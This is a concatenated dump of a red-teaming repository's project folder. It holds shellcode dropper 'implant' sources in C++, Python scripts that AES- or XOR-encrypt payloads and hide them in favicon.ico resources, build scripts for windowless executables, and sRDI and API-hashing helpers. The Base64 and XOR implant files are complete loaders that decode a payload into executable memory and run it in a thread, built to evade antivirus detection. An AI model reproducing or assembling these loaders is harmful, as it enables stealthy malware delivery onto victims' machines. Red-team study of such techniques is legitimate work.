0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | rc resources.rc 3 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 4 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /SUBSYSTEM:WINDOWS /MACHINE:x64 /OUT:implant.exe resources.o 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.o -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Dropper_AES_Favicon_MapView_Explorer/resources.res -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Notepad/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Notepad/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Notepad/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Notepad/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/DLL/aesencrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | print('char Payload[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in ct) + ' };') 34 | 35 | 36 | if __name__ == '__main__': 37 | main() -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/DLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W0 /D_USRDLL /D_WINDLL *.cpp /MT /link /DLL /OUT:implant.dll 4 | echo Cleaning up... 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /SUBSYSTEM:WINDOWS /MACHINE:x64 /OUT:implant.exe 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/DotNet/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/FunctionTest/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // FunctionTest.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/FunctionTest/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/FunctionTest/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/Native/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // RDIShellcodeCLoader.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/Native/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/Native/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/ShellcodeRDI/ShellcodeRDI.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/ShellcodeRDI/function_link_order.txt: -------------------------------------------------------------------------------- 1 | LoadDLL 2 | GetProcAddressWithHash -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/TestDLL/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/TestDLL/Resource.rc -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/TestDLL/TestDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/TestDLL/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/bin/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/lib/PowerShell/Out-Shellcode.ps1: -------------------------------------------------------------------------------- 1 | Param ( 2 | [Parameter(Position = 0, Mandatory = $True)] 3 | [String] 4 | $InputExe, 5 | 6 | [Parameter(Position = 1, Mandatory = $True)] 7 | [ValidateScript({ Test-Path $_ })] 8 | [String] 9 | $InputMapFile, 10 | 11 | [Parameter(Position = 2, Mandatory = $True)] 12 | [String] 13 | $OutputFile 14 | ) 15 | 16 | # PowerShell v2 17 | if(!$PSScriptRoot){ 18 | $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 19 | } 20 | 21 | . "$PSScriptRoot\Get-PEHeader.ps1" 22 | 23 | $PE = Get-PEHeader $InputExe -GetSectionData 24 | $TextSection = $PE.SectionHeaders | Where-Object { $_.Name -eq '.text' } 25 | 26 | $MapContents = Get-Content $InputMapFile 27 | 28 | $TextSectionInfo = @($MapContents | Where-Object { $_ -match '\.text.+CODE' })[0] 29 | 30 | $ShellcodeLength = [Int] "0x$(( $TextSectionInfo -split ' ' | Where-Object { $_ } )[1].TrimEnd('H'))" - 1 31 | 32 | Write-Host "Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))" 33 | 34 | [IO.File]::WriteAllBytes($OutputFile, $TextSection.RawData[0..$ShellcodeLength]) 35 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Reflected_DLL_MapView_Explorer/sRDI/lib/Python/FunctionToHash.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | 4 | ror = lambda val, r_bits, max_bits: \ 5 | ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ 6 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) 7 | 8 | if len(sys.argv) != 2 and len(sys.argv) != 3: 9 | print("\nUsage:\nFunctionToHash.py [Module] [Function]\nFunctionToHash.py kernel32.dll CreateProcessA\n\nOR\n\nFunctionToHash.py [Function]\nFunctionToHash.py ExportedFunction") 10 | exit() 11 | 12 | if len(sys.argv) == 3: 13 | module = sys.argv[1].upper().encode('UTF-16LE') + b'\x00\x00' 14 | function = sys.argv[2].encode() + b'\x00' 15 | 16 | functionHash = 0 17 | 18 | for b in function: 19 | functionHash = ror(functionHash, 13, 32) 20 | functionHash += b 21 | 22 | moduleHash = 0 23 | 24 | for b in module: 25 | moduleHash = ror(moduleHash, 13, 32) 26 | moduleHash += b 27 | 28 | functionHash += moduleHash 29 | 30 | if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000 31 | 32 | else: 33 | function = sys.argv[1].encode() + b'\x00' 34 | 35 | functionHash = 0 36 | 37 | for b in function: 38 | functionHash = ror(functionHash, 13, 32) 39 | functionHash += b 40 | 41 | 42 | print(hex(functionHash)) 43 | -------------------------------------------------------------------------------- /coding/projects/Dropper_XOR_Favicon_Notepad/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /coding/projects/Dropper_XOR_Favicon_Notepad/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Dropper_XOR_Favicon_Notepad/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Dropper_XOR_Favicon_Notepad/xorencrypt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | KEY = "privatekeyforxorencryptionfunction" 4 | 5 | def xor(data, key): 6 | 7 | key = str(key) 8 | l = len(key) 9 | output_str = "" 10 | 11 | for i in range(len(data)): 12 | current = data[i] 13 | current_key = key[i % len(key)] 14 | output_str += chr(ord(current) ^ ord(current_key)) 15 | 16 | return output_str 17 | 18 | def printCiphertext(ciphertext): 19 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 20 | 21 | 22 | 23 | try: 24 | plaintext = open(sys.argv[1], "rb").read() 25 | except: 26 | print("File argument needed! %s " % sys.argv[0]) 27 | sys.exit() 28 | 29 | 30 | ciphertext = xor(plaintext, KEY) 31 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 32 | -------------------------------------------------------------------------------- /coding/projects/Dropper_XOR_Favicon_Notepad/xorencryptfavicon.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | KEY = "privatekeyforxorencryptionfunction" 4 | 5 | def xor(data, key): 6 | 7 | key = str(key) 8 | l = len(key) 9 | output_str = "" 10 | 11 | for i in range(len(data)): 12 | current = data[i] 13 | current_key = key[i % len(key)] 14 | output_str += chr(ord(current) ^ ord(current_key)) 15 | 16 | return output_str 17 | 18 | def printCiphertext(ciphertext): 19 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 20 | 21 | try: 22 | plaintext = str(open(sys.argv[1], "rb").read()) 23 | except: 24 | print("File argument needed! %s " % sys.argv[0]) 25 | sys.exit() 26 | 27 | ciphertext = xor(plaintext, KEY) 28 | open("favicon.ico", "wb").write(ciphertext) -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/AES/aesencrypt.py: -------------------------------------------------------------------------------- 1 | # author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | import sys 4 | from Crypto.Cipher import AES 5 | from os import urandom 6 | import hashlib 7 | 8 | KEY = urandom(16) 9 | 10 | def pad(s): 11 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 12 | 13 | def aesenc(plaintext, key): 14 | 15 | k = hashlib.sha256(key).digest() 16 | iv = 16 * '\x00' 17 | plaintext = pad(plaintext) 18 | cipher = AES.new(k, AES.MODE_CBC, iv) 19 | 20 | return cipher.encrypt(bytes(plaintext)) 21 | 22 | try: 23 | plaintext = open(sys.argv[1], "rb").read() 24 | except: 25 | print("File argument needed! %s " % sys.argv[0]) 26 | sys.exit() 27 | 28 | ciphertext = aesenc(plaintext, KEY) 29 | print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };') 30 | print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/AES/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Base64/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Base64/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #pragma comment (lib, "Crypt32.lib") 9 | 10 | unsigned char payl[] = ""; 11 | unsigned int len = sizeof(payl); 12 | 13 | int DecodeBase64( const BYTE * src, unsigned int srcLen, char * dst, unsigned int dstLen ) { 14 | 15 | DWORD outLen; 16 | BOOL fRet; 17 | 18 | outLen = dstLen; 19 | fRet = CryptStringToBinary( (LPCSTR) src, srcLen, CRYPT_STRING_BASE64, (BYTE * )dst, &outLen, NULL, NULL); 20 | 21 | if (!fRet) outLen = 0; // failed 22 | 23 | return( outLen ); 24 | } 25 | 26 | 27 | int main(void) { 28 | 29 | void * exec_mem; 30 | BOOL rv; 31 | HANDLE th; 32 | DWORD oldprotect = 0; 33 | 34 | // Allocate new memory buffer for payload 35 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 36 | 37 | // Decode the payload back to binary form 38 | DecodeBase64((const BYTE *)payl, len, (char *) exec_mem, len); 39 | 40 | // Set the buffer executable 41 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 42 | 43 | // Run the payload 44 | if ( rv != 0 ) { 45 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 46 | WaitForSingleObject(th, -1); 47 | } 48 | 49 | return 0; 50 | } -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Xor/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Xor/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void XOR(char * data, size_t data_len, char * key, size_t key_len) { 9 | int j; 10 | 11 | j = 0; 12 | for (int i = 0; i < data_len; i++) { 13 | if (j == key_len - 1) j = 0; 14 | 15 | data[i] = data[i] ^ key[j]; 16 | j++; 17 | } 18 | } 19 | 20 | int main(void) { 21 | 22 | void * exec_mem; 23 | BOOL rv; 24 | HANDLE th; 25 | DWORD oldprotect = 0; 26 | 27 | unsigned char payl[] = { }; 28 | unsigned int len = sizeof(payl); 29 | char key[] = ""; 30 | 31 | // Allocate a buffer for payload 32 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 33 | 34 | // Decrypt (DeXOR) the payload 35 | XOR((char *) payl, len, key, sizeof(key)); 36 | 37 | // Copy the payload to allocated buffer 38 | RtlMoveMemory(exec_mem, payl, len); 39 | 40 | // Set the buffer executable 41 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 42 | 43 | // Run the payload 44 | if ( rv != 0 ) { 45 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 46 | WaitForSingleObject(th, -1); 47 | } 48 | 49 | return 0; 50 | } -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Xor/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | import sys 4 | 5 | KEY = "" 6 | 7 | def xor(data, key): 8 | 9 | key = str(key) 10 | l = len(key) 11 | output_str = "" 12 | 13 | for i in range(len(data)): 14 | current = data[i] 15 | current_key = key[i % len(key)] 16 | output_str += chr(ord(current) ^ ord(current_key)) 17 | 18 | return output_str 19 | 20 | def printCiphertext(ciphertext): 21 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 22 | 23 | try: 24 | plaintext = str(open(sys.argv[1], "rb").read()) 25 | except: 26 | print("File argument needed! %s " % sys.argv[0]) 27 | sys.exit() 28 | 29 | ciphertext = xor(plaintext, KEY) 30 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') -------------------------------------------------------------------------------- /coding/projects/Encoding_Encryption/Xor/xorenryptfavicon.py: -------------------------------------------------------------------------------- 1 | # author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | import sys 4 | 5 | KEY = "" 6 | 7 | def xor(data, key): 8 | 9 | key = str(key) 10 | l = len(key) 11 | output_str = "" 12 | 13 | for i in range(len(data)): 14 | current = data[i] 15 | current_key = key[i % len(key)] 16 | output_str += chr(ord(current) ^ ord(current_key)) 17 | 18 | return output_str 19 | 20 | def printCiphertext(ciphertext): 21 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 22 | 23 | try: 24 | plaintext = str(open(sys.argv[1], "rb").read()) 25 | except: 26 | print("File argument needed! %s " % sys.argv[0]) 27 | sys.exit() 28 | 29 | ciphertext = xor(plaintext, KEY) 30 | open("favicon.ico", "wb").write(ciphertext) -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /W0 hookem.cpp /MT /link /DLL detours\lib.X64\detours.lib /OUT:hookem.dll 4 | 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp hookme.cpp /link /OUT:hookme.exe /SUBSYSTEM:CONSOLE 6 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/.gitignore: -------------------------------------------------------------------------------- 1 | # C extensions 2 | *.so 3 | 4 | # Unit test / coverage reports 5 | .coverage 6 | .tox 7 | nosetests.xml 8 | 9 | # Translations 10 | *.mo 11 | 12 | # Mr Developer 13 | .mr.developer.cfg 14 | .project 15 | .pydevproject 16 | 17 | # vim 18 | *~ 19 | *.swp 20 | 21 | # Visual Studio build 22 | *.ipch 23 | .vs/ 24 | output/ 25 | include/ 26 | *.exp 27 | *.pdb 28 | *.lib 29 | *.dll 30 | *.exe 31 | obj.* 32 | *.ipdb 33 | *.iobj 34 | *.tlog 35 | *.log 36 | *.obj 37 | *.user 38 | *.recipe 39 | /bin.* 40 | *.vcxproj.FileListAbsolute.txt 41 | *.vcxprojAssemblyReference.cache 42 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/LICENSE.md: -------------------------------------------------------------------------------- 1 | # Copyright (c) Microsoft Corporation 2 | 3 | All rights reserved. 4 | 5 | # MIT License 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy of 8 | this software and associated documentation files (the "Software"), to deal in 9 | the Software without restriction, including without limitation the rights to 10 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 11 | of the Software, and to permit persons to whom the Software is furnished to do 12 | so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/comeasy/wrotei.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for wrotei.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "wrotei" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "wrotei" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours COM Easy Sample" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/commem/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours Test Programs. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | !include ..\common.mak 11 | 12 | LIBS=$(LIBS) kernel32.lib 13 | 14 | all: dirs \ 15 | $(BIND)\commem.exe \ 16 | !IF $(DETOURS_SOURCE_BROWSING)==1 17 | $(OBJD)\commem.bsc 18 | !ENDIF 19 | 20 | clean: 21 | -del *~ *.obj *.sbr 2> nul 22 | -del $(BIND)\commem.* 2> nul 23 | -rmdir /q /s $(OBJD) 2>nul 24 | 25 | realclean: clean 26 | -rmdir /q /s $(OBJDS) 2>nul 27 | 28 | dirs: 29 | @if not exist $(BIND) mkdir $(BIND) && echo. Created $(BIND) 30 | @if not exist $(OBJD) mkdir $(OBJD) && echo. Created $(OBJD) 31 | 32 | $(BIND)\commem.obj : commem.cpp 33 | 34 | $(BIND)\commem.exe : $(OBJD)\commem.obj $(DEPS) 35 | cl $(CFLAGS) /Fe$@ /Fd$(@R).pdb $(OBJD)\commem.obj \ 36 | /link $(LINKFLAGS) $(LIBS) ole32.lib /subsystem:console 37 | 38 | $(OBJD)\commem.bsc : $(OBJD)\commem.obj 39 | bscmake /v /n /o $@ $(OBJD)\commem.sbr 40 | 41 | ############################################################################## 42 | 43 | test: $(BIND)\commem.exe 44 | @echo. 45 | $(BIND)\commem.exe 46 | @echo. 47 | 48 | ################################################################# End of File. 49 | -------------------------------------------------------------------------------- /coding/projects/Hooking/Detours/detours/samples/cping/cping.dat: -------------------------------------------------------------------------------- 